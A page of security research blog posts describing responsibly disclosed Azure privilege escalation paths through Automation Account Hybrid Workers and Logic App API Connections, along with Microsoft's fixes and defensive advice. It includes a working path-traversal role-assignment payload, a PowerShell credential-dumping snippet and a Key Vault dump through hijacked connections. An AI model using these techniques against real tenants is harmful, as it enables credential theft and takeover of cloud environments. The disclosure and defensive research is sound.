Josh Magri

Josh has a B.A. in Computer Science from the University of Iowa and currently holds the GSEC, GCIH, GCFA, and OSCP certifications. He has experience as a penetration tester, red teamer, and application security consultant.
Abusing Azure Hybrid Workers for Privilege Escalation – Part 2: An Azure PrivSec Story
April 14, 2022

The NetSPI team recently discovered a set of issues that allows any Azure user with the Subscription Reader role to dump saved credentials and certificates from Automation Accounts. In cases where Run As accounts were used, this allowed for a Reader to Contributor privilege escalation path.

This is part two of a two-part blog series. In part one, we walked through a privilege escalation scenario by abusing Azure hybrid workers. In this blog, we’ll dig a little deeper and explain how we utilized an undocumented internal API to poll information about the Automation Account (Runbooks, Credentials, Jobs).

Note: The scope of this bug is limited to a subscription. A subscription Reader account is necessary to exploit this bug, and it is not a cross-tenant issue.

Background: Azure Hybrid Worker Groups

This research began with studying how Azure Automation authenticates Hybrid Worker nodes and looking for potential abuse mechanisms.

Azure Automation’s core feature is Runbooks, which are pieces of code that can be run on Azure’s Infrastructure or customer-owned Azure Virtual Machines (VMs). These are often used to run scheduled tasks or manage Azure resources. To accomplish this, the runbooks must be authenticated, which can be accomplished through several methods.  

Users can store credentials in Automation Accounts (AA) and access them via Runbooks. Automation Accounts can also use Run As accounts to create a Service Principal that will be used for authentication via a certificate stored in the Automation Account.  

The third option is using Managed Identities, which is what Microsoft is pushing users towards. Managed Identities allow the user to obtain a token at runtime to authenticate and eliminate the issue of stored credentials. The Get-AzPasswords script from the MicroBurst project supports dumping all three kinds of authentication, so long as you have Contributor access.  

Normally, a Runbook is executed in a sandbox on Azure’s infrastructure. However, this comes with certain constraints, namely processing power and execution time. Any long running or resource intensive code may be ill-suited to run in this manner.  

To bridge this gap, Azure offers Hybrid Worker Groups (HWG). HWGs offer users the ability to run Runbooks on their own Azure Virtual Machines, so they can run on more powerful machines for longer.  

Normally, this is accomplished by deploying a Virtual Machine Extension to the desired Virtual Machine to register the Virtual Machine as a HWG node. Then, the user can execute Runbooks on those Hybrid Worker nodes.  

There are also two types of HWGs: User and System. System HWGs are used for Update Management and don’t have the necessary permissions for what we’re interested in, so we’ll be focusing on User HWGs.

The First Set of Issues: Compromising Credentials

We began our research with a registered Hybrid Worker node. When you execute a runbook on the host, the HybridWorkerService process spawns the Orchestrator.Sandbox process. The command line for the latter is as follows.

Next, we focused on MSISecret. At first glance, it appears that the Hybrid Worker node must be able to use this to request an MSI token externally. After reversing the binary, this turned out to be true. 

Every Automation Account has a “Job Runtime Data Service” endpoint, or JRDS, which Hybrid Workers use to poll for jobs and request credentials. You can see the JRDS URL supplied in the command line above. Below is what the full path to request a token looks like in the binary. 

And here you can see this in action.

You can only get that MSI secret after receiving a job from the JRDS endpoint, which can be achieved by polling the /sandboxes endpoint. HWGs hand out jobs on a first-come, first-served basis, so whichever node polls the endpoint first gets the job. By default, nodes poll every 60 seconds, so if we poll constantly, we should almost always beat the other nodes to a job and its secret. However, this only works if Runbook jobs are actively being run through the HWG.
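The race described above can be sketched as a simple polling loop. The /sandboxes endpoint name comes from this research; `fetch_sandbox` is a stand-in for an authenticated request to the JRDS URL, not a real client:

```python
import time

def poll_for_job(fetch_sandbox, interval=1.0, max_attempts=60):
    """Poll until the JRDS endpoint hands us a sandbox/job assignment.

    Legitimate hybrid workers poll roughly every 60 seconds, so a tight
    loop here will usually win the race for the next queued job."""
    for _ in range(max_attempts):
        job = fetch_sandbox()  # hypothetical GET against <JRDS URL>/sandboxes
        if job is not None:
            return job
        time.sleep(interval)
    return None
```

Tighten `interval` well below the 60-second default and the attacker-controlled node claims nearly every job that carries a secret.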

Since we’re able to request Managed Identity tokens, it would make sense that we can request other forms of authentication. A quick grep through the decompiled binary makes this apparent, and a quick request to these endpoints will yield results. 

The JSON Web Token (JWT) in these requests is for the System Assigned MI of the Virtual Machine, not a management token for Azure.

Requesting all certificates:

We were satisfied with these findings. We figured that this represented an escalation path from Virtual Machine Contributor to Subscription Contributor if Hybrid Worker nodes were in use, and we reported our findings to Microsoft.

Escalating Our Findings

After we had submitted our report, we found a recently published blog that detailed some of these same ideas, though their thesis was obtaining lateral movement after an administrator pushed a certificate to the Virtual Machine. The author also demonstrated that you could register a new Hybrid Worker node to an Automation Account using the Automation Account key and Log Analytics Workspace key. We wondered if we could abuse this route to escalate the severity of our previous findings.

To read Automation Account keys, a user only needs the Reader role. To exploit this, we hacked up some source code from Microsoft’s Desired State Configuration (DSC) repository.

The repository contained some scripts that are used to register a new Hybrid Worker node, so we bypassed some environment checks and created users/groups that are expected to exist. The registration process looks like this: 

  1. Generate a new self-signed certificate or use an existing one
  2. Create a payload with some details: HWG name, IP address, certificate thumbprint, etc.
  3. Sign the payload with the AA key
  4. Send a PUT request to the AA with all the above info 

This also does not require Hybrid Worker Groups to already be in use; we can supply an arbitrary group name and it will be created. After registering, we can use the certificate and key generated during this process to access the same endpoints that we identified earlier. You also don’t need a Log Analytics workspace key to register because not all AAs are linked to a workspace. 

From start to finish, this exploit works as follows: 

  1. Attacker with Reader access reads the victim Automation Account key
  2. Attacker uses this key to register their own Virtual Machine in their own tenant as a Hybrid Worker node
  3. Attacker can dump any credentials or certificates from the victim AA and use them to authenticate 
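For step 1, the Automation Account keys can be read with a single ARM GET request. A sketch of building that request URL follows; the `agentRegistrationInformation` segment and the api-version are assumptions modeled on the Az.Automation PowerShell cmdlets, not confirmed here:

```python
def registration_info_url(subscription_id: str, resource_group: str,
                          account_name: str,
                          api_version: str = "2019-06-01") -> str:
    # Returns the ARM endpoint that exposes the AA keys and registration URL
    return (
        "https://management.azure.com"
        f"/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.Automation/automationAccounts/{account_name}"
        f"/agentRegistrationInformation?api-version={api_version}"
    )

url = registration_info_url("SUB-ID", "victim-rg", "victim-aa")
```

A Reader-scoped ARM token was enough to call this endpoint before the fix, which is exactly why Microsoft later pulled the ListKeys permission out of the Reader role.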

We reported this issue to MSRC in a separate report. Below is the timeline for this case: 

  • October 25, 2021: Initial report submitted 
  • December 13, 2021: Second report submitted with details of full privilege escalation 
  • December 31, 2021: $10k bounty awarded 
  • March 14, 2022: Patch is applied 

Microsoft’s Response to the Azure Automation Account Vulnerabilities

After reporting our findings, Microsoft identified the Azure Automation customers vulnerable to this exploit and notified them through the Azure portal. A fix has been rolled out to all customers.

Additionally, Microsoft has updated their documentation with mitigation steps for customers. They’ve updated the Reader role so that it no longer has the ListKeys permission on Automation Accounts and can no longer fetch Automation Account keys. They recommend that customers switch to custom roles if they need a Reader to fetch the Automation Account keys.

Microsoft has also provided the following guidance for deploying Hybrid Workers:

Microsoft recommends installing Hybrid workers using the Hybrid Runbook Worker Virtual Machine extension – without using the automation account keys – for registration of hybrid worker. Microsoft recommends this platform as it leverages a secure Azure AD based authentication mechanism and centralizes the control and management of identities and other resource credentials. Refer to the security best practices for Hybrid worker role.

Conclusion

This issue allowed any user who could read Automation Account keys to extract any credentials or certificates from the affected Automation Account. This issue was not particularly technical or difficult to exploit, and only abused the intended methods for registration and credential retrieval. 

This is a good reminder that even low privileged role assignments such as Reader can have unintended consequences in your cloud environment. 

Want to learn more about cloud penetration testing? Consider registering for NetSPI’s upcoming Dark Side Ops: Azure Cloud Pentesting training or explore our Azure cloud penetration testing service.

Escalating from Logic App Contributor to Root Owner in Azure
March 9, 2022

In October 2021, I was performing an Azure penetration test. By the end of the test, I had gained Owner access at the Root level of the tenant. This blog post will provide a short walkthrough of what I found and disclosed to the Microsoft Security Response Center (MSRC).

What was the bug?

The short explanation is that having Contributor access to an Azure Resource Manager (ARM) API Connection would allow you to create arbitrary role assignments as the connected user. This was supposed to be limited to actions at the Resource Group level, but an attacker could escape to the Subscription or Root level with a path traversal payload.

How did I find it?

It’s fair to say that I have spent a lot of time hacking on Logic Apps, and I experience a lot of recency bias with the services that I’ve dug into. After I published my Logic App research, I started seeing Logic Apps popping up on my tests. 

To recap, Azure Logic Apps use API Connections to authenticate actions to services. In my blog, Illogical Apps – Exploring and Exploiting Azure Logic Apps, I discuss how to tease unintended functionality out of Logic Apps to perform actions as the authenticated user. The examples I use involve listing out additional key vault keys or adding users to Azure AD. 

When we create an API Connection, it requires a user to authenticate it. That authentication persists for the lifetime of the API Connection, unless changes are made that invalidate it. You can view the connection dialog below.

API Connection dialog

In this environment there was an Azure Resource Manager API Connection authenticated as a user with User Access Administrator rights at the Root level. If you’re not familiar with Azure terminology, the User Access Administrator role allows for creating new role assignments, and the Root level is the highest tier in an Azure tenant. I had not looked at the ARM connector in my prior research, but I was confident we could abuse this level of access.

Initial Recon

Generally, our goal is to escalate to the Owner role on a Subscription. This is similar to getting Domain Administrator (DA) on an internal network penetration test in the sense that it is a bit oversimplified, but very useful for demonstrating the severity of a finding. I started looking at the relevant ARM actions that I could use to achieve this. Consulting the Microsoft documentation, “Create or update a resource group” looked like a good starting point. But looking at the parameters for the action, the Subscription and Resource Group parameters are required.

Create or update a resource group

While they’re required, we can insert custom values. If we make the Resource Group blank, will that work? No. Here’s why: API Connections are just wrappers around an API as the name would suggest. These APIs are defined by Swagger docs, and we can pull down the whole Swagger definition by using an ARM API Connection in a Logic App and making a request to the following resource:

/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{LogicAppName}?api-version=2016-10-01&$expand=properties/swagger

Looking at the Swagger definition, the endpoint for this action is a PUT request to this path:

/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{shortResourceId}

So, we can reasonably assume that when we use a blank Resource Group name, a request is getting made to:

/subscriptions/{subscriptionId}/resourceGroups//providers/[truncated]

And we get an error since this Resource Group does not exist. At this point, I verified that using a valid Subscription and Resource Group name, it was possible to create Role Assignments at the Resource Group level. This is because Role Assignments are created like any other resource in Azure. At a minimum I was able to (as a Contributor) give myself Owner rights on all the Resource Groups in a Subscription. Still not a bad privilege escalation, but we can do better.

You might have spotted where this is headed given the format of the path above. If we can include custom values for the Resource Group and Subscription, can we manipulate the final path to perform actions at different scopes? If we provide “..%2F” as the Resource Group name, then our path will match the right Swagger path, but the server will resolve the payload and our request will end up going to:

/subscriptions/{subscriptionId}/providers/[truncated]

Now we can create Role Assignments at the Subscription level! Taking this one step further, we can traverse the Subscription path too, and create Role Assignments at the Root level (if the connected user has sufficient access).
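You can convince yourself of the traversal with a few lines of Python: the encoded segment survives route matching as a single "resource group name", but decoding plus normalization collapses the resourceGroups scope away (placeholder IDs throughout):

```python
import posixpath
from urllib.parse import unquote

# The route template expects .../resourceGroups/{rg}/providers/..., and the
# encoded "..%2F" still reads as one path segment at match time.
crafted = ("/subscriptions/SUB-ID/resourceGroups/..%2F"
           "providers/Microsoft.Authorization/roleAssignments/GUID")

# Once the server decodes and normalizes the path, the traversal removes
# the resource-group scope, leaving a subscription-level request.
resolved = posixpath.normpath(unquote(crafted))
print(resolved)
# -> /subscriptions/SUB-ID/providers/Microsoft.Authorization/roleAssignments/GUID
```

The same trick repeated against the subscription segment is what pushes the request up to the Root scope.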

Unnecessary Optimizations

At this point I had a working exploit in my lab, and I went to reproduce it in the client environment. It went off without a hitch, and I was now a Subscription Owner. While I was setting up the Logic App, I noticed something that I hadn’t before: Since my lab environment is very small, when I clicked the Subscription dropdown menu, it was populated with Subscriptions that my account didn’t have access to. This meant that these Subscriptions were being fetched in the context of the API Connection user – but I hadn’t run a Logic App.

To track down the behavior, I fired up Burp Suite and found that a request was being made to the “dynamicInvoke” endpoint of the API Connection. The request payload looked like this:

{"request":{"method":"get","path":"/subscriptions","queries":{"x-ms-api-version":"2016-06-01"}}}

And the response looked like this:

{"response":{"statusCode":"OK","body":{"value":[
  {"id":"/subscriptions/[REDACTED]","authorizationSource":"RoleBased",
   "subscriptionId":"[REDACTED]","displayName":"temp_sub","state":"Enabled",
   "subscriptionPolicies":{"locationPlacementId":"Public_2014-09-01",
   "quotaId":"PayAsYouGo_2014-09-01","spendingLimit":"Off"}}]}}}

Another area that I’ve spent a lot of time looking at is Azure’s REST API. Given that the response JSON included a status code, I figured the request to the dynamicInvoke endpoint triggered the server into making a request in the context of the connected user. 

For those curious, my understanding is that the server makes a request to https://logic-apis-[region].token.azure-apim.net:443/tokens/logic-apis-[region]/[connectorname]/[connector-id]/exchange which returns a token to the server. 

You can verify this by sending malformed input in the path value to the dynamicInvoke endpoint and observing the output. I assume that the returned token is then used to access the relevant services as the connected user.

Anyways, we can just hit this endpoint directly to trigger our exploit instead of creating a Logic App. This is what the final payload looked like:

{
    "request": {
        "method": "PUT",
        "path": "/subscriptions/$subscriptionId/resourceGroups/..%2Fproviders/Microsoft.Authorization/roleAssignments%2F$guid",
        "queries": { "x-ms-api-version": "2015-07-01" },
        "body": {
            "properties": {
                "principalId": "$principalId",
                "roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/$roleDefinitionId"
            }
        }
    }
}

I also confirmed that trying to hit the Subscription directly (without the resourceGroups part) via this endpoint did not work; it yielded a 404 error. But if we included the path traversal payload, a nice “201 Created” message was returned instead. This is important, because it is proof that this wasn’t intended behavior. 

Conclusion

To summarize, I was able to escalate from a Subscription Contributor to Root Owner by abusing an API Connection. The root cause of this behavior was that a path traversal payload would meet the Swagger API definition, and the payload would be resolved by the server resulting in a request to an unintended scope. 

This issue was responsibly disclosed to MSRC and acknowledged by Microsoft in March 2022. They remediated the issue by filtering the method value to block the paths that include the path traversal payload. 

I would still recommend that anyone using API Connections evaluate which users are authenticated for each connection. If any of the authenticated users are privileged, there may be a possibility for abuse.

Illogical Apps – Exploring and Exploiting Azure Logic Apps
August 26, 2021

When we’re doing Azure cloud penetration tests, every single one is different. Each environment is set up differently and uses different services in tandem with one another to achieve different goals. For that reason, we’re constantly looking for new ways to abuse different Azure services. In this blog post, I’ll talk about the work I’ve done with abusing Azure Logic Apps. I’ll walk through how to obtain sensitive information as a user with the Reader role and how to identify/abuse API Connection hijack scenarios as a Contributor.

What are Logic Apps?

In Azure, Logic Apps are similar to Microsoft’s “Power Automate” family, which my colleague Karl Fosaaen examined in his blog, Bypassing External Mail Forwarding Restrictions with Power Automate. A Logic App is a way to write low-code or no-code workflows for performing automated tasks.

Here’s an example workflow:

  • Every day at 5:30PM
  • Check the “reports” inbox for new emails
  • If any emails have “HELLO” in the subject line
  • Respond with “WORLD!”
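For illustration, that workflow maps onto a Logic App definition shaped roughly like this; the action names and connector inputs are simplified assumptions, not a literal export:

```json
{
  "triggers": {
    "Every_day_at_5_30": {
      "type": "Recurrence",
      "recurrence": {
        "frequency": "Day",
        "interval": 1,
        "schedule": { "hours": [ 17 ], "minutes": [ 30 ] }
      }
    }
  },
  "actions": {
    "Check_reports_inbox_for_new_emails": {
      "type": "ApiConnection",
      "inputs": { "host": { "connection": "office365" }, "method": "get" }
    },
    "If_subject_contains_HELLO": {
      "type": "If",
      "expression": "@contains(triggerBody()?['Subject'], 'HELLO')",
      "actions": {
        "Respond_with_WORLD": { "type": "ApiConnection", "inputs": { "method": "post" } }
      }
    }
  }
}
```

The definition, including every action's inputs, is exactly what a Reader can pull down, which is what the next section abuses.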

In order to perform many useful actions, like accessing an email inbox, the Logic App will need to be authenticated to the attached service. There are a few ways to do this, and we’ll look at some potential abuse mechanisms for these connections.

As a Reader

Testing an Azure subscription with a Reader account is a fairly common scenario. A lot of abuse scenarios for the Reader role stem from finding credentials scattered throughout various Azure services, and Logic Apps are no different. Most Logic App actions provide input parameters for users to provide arguments, like a URL or a file name. In some cases, these inputs include authentication details. There are many different actions that can be used in a Logic App, but for this example we’ll look at the “HTTP Request” action.

Below is an HTTP Request action in the Logic App designer, with “Authentication” enabled. You can see there are several fields that may be interesting to an attacker. Once these fields are populated and saved, any Reader can dump them out of the Logic App definition.

HTTP Request action in the Logic App designer, with “Authentication” enabled

As a tester, I wanted a generic way to dump these out automatically. This is pretty easy with a few lines of PowerShell.

$allLogicApps = Get-AzLogicApp
foreach($app in $allLogicApps){
    $appName = $app.Name
    # The definition is returned as a Newtonsoft object, so round-trip it
    # through JSON to get something PowerShell can enumerate
    $actions = ($app.Definition.ToString() | ConvertFrom-Json | Select-Object actions).actions
    $noteProperties = Get-Member -InputObject $actions | Where-Object {$_.MemberType -eq "NoteProperty"}
    foreach($note in $noteProperties){
        $noteName = $note.Name
        $inputs = $actions.$noteName.inputs
        Write-Output "$appName - $noteName inputs:"
        Write-Output ($inputs | ConvertTo-Json -Depth 10)
    }
    # Parameters supplied to the Logic App can also hold secrets
    $params = $app.Definition.parameters
    if($params){
        Write-Output "$appName parameters:"
        Write-Output $params.ToString()
    }
}

The above snippet provides the raw definition of the Logic App, all of the inputs to any action, and any parameters provided to the Logic App. Looking at the inputs and parameters should help distill out most credentials and sensitive information, but grepping through the raw definition will cover any corner cases. I’ve also added this to the Get-AzDomainInfo script in the MicroBurst toolkit. You can see the results below.

Get-AzDomainInfo script in the MicroBurst toolkit
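The same hunt can be sketched in a language-agnostic way: recursively walk the parsed definition and flag values stored under credential-looking keys. The key list and the sample definition below are illustrative, not exhaustive:

```python
# Keys that commonly hold credentials in Logic App action inputs (illustrative)
INTERESTING_KEYS = {"authentication", "password", "secret", "clientsecret", "pfx"}

def find_secrets(node, path=""):
    """Walk a parsed Logic App definition and collect (path, value) pairs
    for any key whose name suggests it stores a credential."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child_path = f"{path}/{key}"
            if key.lower() in INTERESTING_KEYS:
                hits.append((child_path, value))
            hits.extend(find_secrets(value, child_path))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_secrets(value, f"{path}[{i}]"))
    return hits

# Hypothetical definition fragment: an HTTP action with Basic auth enabled
definition = {"actions": {"HTTP": {"inputs": {
    "uri": "https://internal.example",
    "authentication": {"type": "Basic", "username": "svc", "password": "P@ss"}}}}}
hits = find_secrets(definition)
```

Each hit carries its path in the definition, which makes it easy to trace a leaked value back to the responsible action.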

For something like the basic authentication or raw authentication headers, you may be able to gain access to an externally facing web application and escalate from there. However, you may be able to use the OAuth secret to authenticate to Azure AD as a service principal. This may offer more severe privilege escalation opportunities.

Another thing to look out for as a Reader are the “Run History” and “Versions” tabs. 

The Run History tab contains a history of all previous runs of the Logic App. This includes the definition of the Logic App and any inputs/outputs to actions. In my experience, there is a tendency to leak sensitive information here. For example, below is a screenshot of the Run History entry for a Logic App that dumps all secrets from a Key Vault.

This is a screenshot of the Run History entry for a Logic App that dumps all secrets from a key vault.

While dumping all secrets is unrealistic, a Logic App fetching a secret that is then used to access another service is fairly common. After all, Key Vaults are (theoretically) where secrets should be fetched from. By default, all actions will display their output in Run History, including sensitive actions like getting secrets from a Key Vault. Some actions that seem interesting are actually benign (fetching a file from SharePoint, for instance, doesn’t leak the raw file), but others can be a gold mine. 

The Versions tab contains a history of all previous definitions for the Logic App. This can be especially useful for an attacker since there is no way to remove a version from here. A common phenomenon across any sort of development life cycle is that an application will initially have hardcoded credentials, which are later removed for one reason or another. In this case, we can simply go back to the start of the Logic App versions and start looking for removed secrets. 

The Versions tab contains a history of all previous definitions for the Logic App.

It’s worth noting that this is largely the same information as the Run History tab and is actually less useful because it does not contain inputs/outputs obtained at runtime, but it does include versions that were never run. So, if a developer committed secrets in a Logic App and then removed them without running the Logic App, we can find that definition in the Versions tab. 

I’ve added a small function, Get-AzLogicAppUnusedVersions, to MicroBurst which will take a target Logic App and identify any versions that were created but not used in a run. This may help to identify which versions you can find in the Run History tab, and which are only in the Versions tab.
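At its core, that function is a set difference between the versions that exist and the versions referenced by runs. A simplified sketch of the logic (version identifiers below are placeholders):

```python
# Sketch of the comparison behind Get-AzLogicAppUnusedVersions:
# versions that appear in the Versions tab but in no Run History entry.

def unused_versions(all_versions, run_versions):
    """Return versions that were created but never used in a run."""
    used = set(run_versions)
    return [v for v in all_versions if v not in used]

versions = ["v1", "v2", "v3"]           # from the Versions tab
runs = ["v1", "v3"]                     # versions referenced by Run History
print(unused_versions(versions, runs))  # ['v2']
```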

Interested in MicroBurst? Check out NetSPI’s other open source tools

Testing Azure with Contributor Rights

As with all things Azure, if you have Contributor rights, then things become more interesting. 

Another way to provide Logic Apps with authentication is through API Connections. Each API Connection pertains to a specific Azure service, such as Blob Storage or Key Vault, or to a third-party service like SendGrid. In certain cases, we can reuse these API Connections to tease out some, perhaps unintended, functionality. For example, a legitimate user creates an API Connection to a Key Vault for their own Logic App to use. If we then create our own Logic App that references the same API Connection, we can perform related actions in the context of the user who created it.

Here’s how the scenario that I described above would work.

  1. An administrator creates the Encrypt-My-Data-Logic-App and gives it an API connection to the Totally-Secure-Key-Vault
  2. A Logic App Contributor creates a new Logic App with that API connection 
  3. The new Logic App will list all secrets in the Key Vault and dump them out
  4. The attacker fetches the dumped secrets from the Logic App output and then deletes the app
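For illustration, the attacker's Logic App in step 3 might have a workflow definition roughly like the following. This is a trimmed sketch: the connection name `keyvault` and the operation path are illustrative, and a real payload would also iterate the returned list to fetch each secret's value.

```json
{
  "definition": {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "triggers": {
      "manual": { "type": "Request", "kind": "Http" }
    },
    "actions": {
      "List_secrets": {
        "type": "ApiConnection",
        "inputs": {
          "host": {
            "connection": {
              "name": "@parameters('$connections')['keyvault']['connectionId']"
            }
          },
          "method": "get",
          "path": "/secrets"
        }
      }
    },
    "outputs": {}
  }
}
```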

To be clear, this isn’t really breaking the Azure or Logic Apps permissions model. When the API Connection is created, it is granted access to an explicit resource. But it’s very possible that a user will grant access to a resource without knowing that they are exposing additional functionality to other Contributors. At least from what I have seen, it is not made evident to users that API Connections can be reused in this manner.

For the example above, you may be saying “So what, a Contributor can just dump the passwords anyways.” You would be correct, but to perform this attack you only need two permissions: Microsoft.Web/connections/* and Microsoft.Logic/*. This can come into play for custom roles, users with the Logic App Contributor role, or users with Contributor scoped to a Resource Group.

For example: an attacker has Contributor over the “DevEnvironment” Resource Group. For one reason or another, an administrator creates an API Connection to the “ProdPasswords” Key Vault. The ProdPasswords vault is in the “ProdEnvironment” Resource Group, but the API Connection is in the DevEnvironment RG. Since the attacker has Contributor over the API Connection, they can create a new Logic App with this API Connection and dump the ProdPasswords vault. This scenario is a bit contrived but in essence you may be able to access resources that you normally could not.

For example: an attacker has Contributor over the “DevEnvironment” Resource Group. For one reason or another, an administrator creates an API Connection to the “ProdPasswords” Key Vault. The ProdPasswords vault is in the “ProdEnvironment” Resource Group, but the API Connection is in the DevEnvironment RG. Since the attacker has Contributor over the API Connection, they can create a new Logic App with this API Connection and dump the ProdPasswords vault. This scenario is a bit contrived but in essence you may be able to access resources that you normally could not.

For other types of connections, the possibilities for abuse become less RBAC-specific. Let’s say there’s a connection to Azure Active Directory (AAD) for listing out the members of an AD group. Maybe the creator of the connection wants to check an email to see if the sender is a member of the “C-SUITE VERY IMPORTANT” group and mark the email as high priority. Assuming this user has AAD privileges, we could hijack this API Connection to add a new user to AAD. Unfortunately, we can’t assign any Azure subscription RBAC permissions since there is no Logic App action for this, but it could be useful for establishing persistence. 

Situationally, if the subscription in question has an Azure Role Assignment for an AAD group, then this does enable us to add our account (or our newly created user) to that group. For example, if the “Security Team” AAD group has Owner rights on a subscription, you can add your account to the “Security Team” group and you are now an Owner. 

  1. The Administrator user creates and authorizes the User-Lookup-Logic-App
  2. An attacker with Contributor creates a new Logic App with this connection
  3. The new Logic App adds the “attacker” user to Azure AD and adds it to the “Security Team” group
  4. The attacker deletes the Logic App
  5. The attacker authenticates to AAD with the newly added account, which now has Owner rights on the subscription from the “Security Team” group

Ryan Hausknecht (@haus3c) discussed the above scenario in a blog about PowerZure. He mentions that he chose not to implement this into PowerZure due to the sheer number of potential actions. As a result, there is no silver bullet abuse technique. However, I wanted a way to make this as plug-and-play as possible. 

API Hijacking in Practice 

Here is a high-level overview of programmatically hijacking an API Connection.

  1. In your own Azure tenant, create a Logic App (LA) replicating the functionality that you want to achieve and place the definition into a file. (This step is manual)
  2. Get the details of the target API Connection
  3. Plug the connection details and the manually created definition into a generic LA template
  4. Create a new LA with your malicious definition
  5. Retrieve the callback URL for the LA and trigger it to run
  6. Retrieve any output or errors
  7. Delete the LA
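Steps 2 through 4 boil down to string substitution: take the target connection's properties and splice them, along with your malicious definition, into a generic workflow template. A simplified sketch follows; the template and field names are stand-ins of my own, not the actual MicroBurst template.

```python
# Sketch: splice a target API Connection's details and a prebuilt malicious
# definition into a generic Logic App template (steps 2-4 above).
import json

GENERIC_TEMPLATE = """{
  "location": "LOCATION",
  "properties": {
    "definition": DEFINITION,
    "parameters": {
      "$connections": {
        "value": {
          "CONNECTION_NAME": {
            "connectionId": "CONNECTION_ID",
            "connectionName": "CONNECTION_NAME",
            "id": "MANAGED_API_ID"
          }
        }
      }
    }
  }
}"""

def build_logic_app(connection, definition):
    """Render the template with the stolen connection details."""
    rendered = (GENERIC_TEMPLATE
                .replace("DEFINITION", json.dumps(definition))
                .replace("CONNECTION_ID", connection["id"])
                .replace("CONNECTION_NAME", connection["name"])
                .replace("MANAGED_API_ID", connection["api_id"])
                .replace("LOCATION", connection["location"]))
    return json.loads(rendered)

conn = {
    "id": "/subscriptions/SUB/resourceGroups/RG/providers/Microsoft.Web/connections/keyvault",
    "name": "keyvault",
    "api_id": "/subscriptions/SUB/providers/Microsoft.Web/locations/eastus/managedApis/keyvault",
    "location": "eastus",
}
app = build_logic_app(conn, {"triggers": {}, "actions": {}})
# `app` is now ready to deploy with the standard Az deployment cmdlets.
```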

Since this is a scenario-specific attack, I’d like to walk through an example. I’ll show how to create a definition that exploits the Key Vault connection described earlier. I’ve published the files that result from following these steps, so you can skip ahead if you’d prefer to just use the existing tooling.

First, you’ll need to have a Key Vault set up. Put at least one secret and one key in there, so that you have targets for testing. 

You’ll want to create a Logic App definition that looks as follows.

Creating a Logic App definition

If you run this, it should list out the secrets from the Key Vault which you can view within the portal. However, if we want to fetch the results via PowerShell, we’ll need to take one more step.

Select the “Logic app code view” window. Right now, the “outputs” object should be empty. Change it to the following, where “secrets_array” is the name of the variable you used earlier. 

"outputs": {
    "result": {
        "type": "Array",
        "value": "@variables('secrets_array')"
    }
}

Now you can get the output of that workflow from the command line as follows:

$history = (Get-AzLogicAppRunHistory -ResourceGroupName "main_rg" -Name "hijackable")[0]; $history.Outputs.result.Value.ToString()

You can see this in action in the example below.

Automation!

So, above is how you would create the Logic App within your own tenant. Automating the process of deploying this definition into the target subscription is as simple as replacing some strings in a template and then calling the standard Az PowerShell functions. I’ve rolled all of this into a MicroBurst script, Invoke-APIConnectionHijack, which is ultimately a wrapper around the Az PowerShell module. The main function is automating away some of the formatting nonsense that I had to fight with when doing this manually. I’ve also placed the above Key Vault dumping script here, which can be used as a template for future development.

The script does the following:

  • Fetches the details of a target connection
  • Fetches the new Logic App definition
  • Formats the above information to work with the Az PowerShell module
  • Creates a new Logic App using the updated template
  • Runs the new Logic App, waits until it has completed, fetches the output, and then deletes the Logic App

To validate that this works, I’ve got a user with just the Logic App Contributor role in my subscription, so this user cannot dump out Key Vault keys directly.

I’ve also changed the normal Logic App definition to a workflow that just runs “Encrypt data with key”, to represent a somewhat normal abuse scenario. And then…

PS C:\Tools\microburst\Misc\LogicApps> Get-AzKeyVault
 
PS C:\Tools\microburst\Misc\LogicApps> Invoke-APIConnectorHijack -connectionName "keyvault" -definitionPath .\logic-app-keyvault-dump-payload.json -logicAppRg "Logic-App-Template"
Creating the HrjFDGvgXyxdtWo logic app...
Created the new logic app...
Called the manual trigger endpoint...
Output from Logic App run:
[
  {
    "value": "test-secret-value",
    "name": "test-secret",
    "version": "c1a95beef1e640a0af844761e1a842cf",
    "contentType": null,
    "isEnabled": true,
    "createdTime": "2021-07-07T19:24:06Z",
    "lastUpdatedTime": "2021-07-07T19:24:06Z",
    "validityStartTime": null,
    "validityEndTime": null
  }
]
Successfully cleaned up Logic App 

And there you have it! A successful API Connection hijack.

Detection/Defenses for your Azure Environment

Generally, one of the best hardening measures for any Azure environment is having a good grip on who has what rights, and where they are applied. The Contributor role will continue to provide plenty of opportunities for privilege escalation, but this is a good reminder that even service-specific roles like Logic App Contributor should be treated with caution. These roles can provide unintended access to other connected services. Users should always be provided with the most granular, least privileged access wherever possible. This is much easier said than done, but this is the best way to make my life as an attacker more frustrating.

To defend against the leakage of secrets in Logic App definitions, you can fetch the secrets at runtime using a Key Vault API connection. I know this seems a bit counterintuitive given the subject of this blog, but it will prevent Readers from being able to obtain cleartext credentials from the definition.

To prevent the leakage of secrets in the inputs/outputs to actions in the Run History tab, you can enable the “Secure Input/Output” setting for any given action. This will prevent the input/output to the action from showing up in that run’s results. You can see this below.

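In the underlying workflow definition, that portal toggle corresponds to a `runtimeConfiguration` block on the action. A sketch of a secret-fetching action with secure inputs and outputs enabled (the action name and trimmed inputs are illustrative):

```json
"Get_secret": {
  "type": "ApiConnection",
  "inputs": { "method": "get", "path": "/secrets/mysecret/value" },
  "runtimeConfiguration": {
    "secureData": {
      "properties": [ "inputs", "outputs" ]
    }
  }
}
```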

Unfortunately, there isn’t a switch to flip for preventing the abuse of API Connections. 

I often find it helpful to think of Azure permissions relationships using the same graph logic as BloodHound (and its Azure ingestor, AzureHound). When we create an API Connection, we are also creating a link to every Contributor or Logic App Contributor in the subscription. This is how it would look in a graph.


In essence, when we create an API Connection with write permissions to AAD, then we are transitively giving all Contributors that permission.

In my opinion, the best way to prevent API Connection abuse is to recognize that any API Connection you create can be used by any Contributor on the subscription. Acknowledging this gives us justification to start assigning users more granular permissions. Two examples of what this might look like:

  • A custom role that provides users with almost normal Contributor rights, but without the Microsoft.Web/connections/* permission. 
  • Assigning a Contributor at the Resource Group level.
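The first option could look roughly like the following custom role definition, which mirrors the built-in Contributor role's NotActions and adds the connections permission. The role name and subscription ID are placeholders.

```json
{
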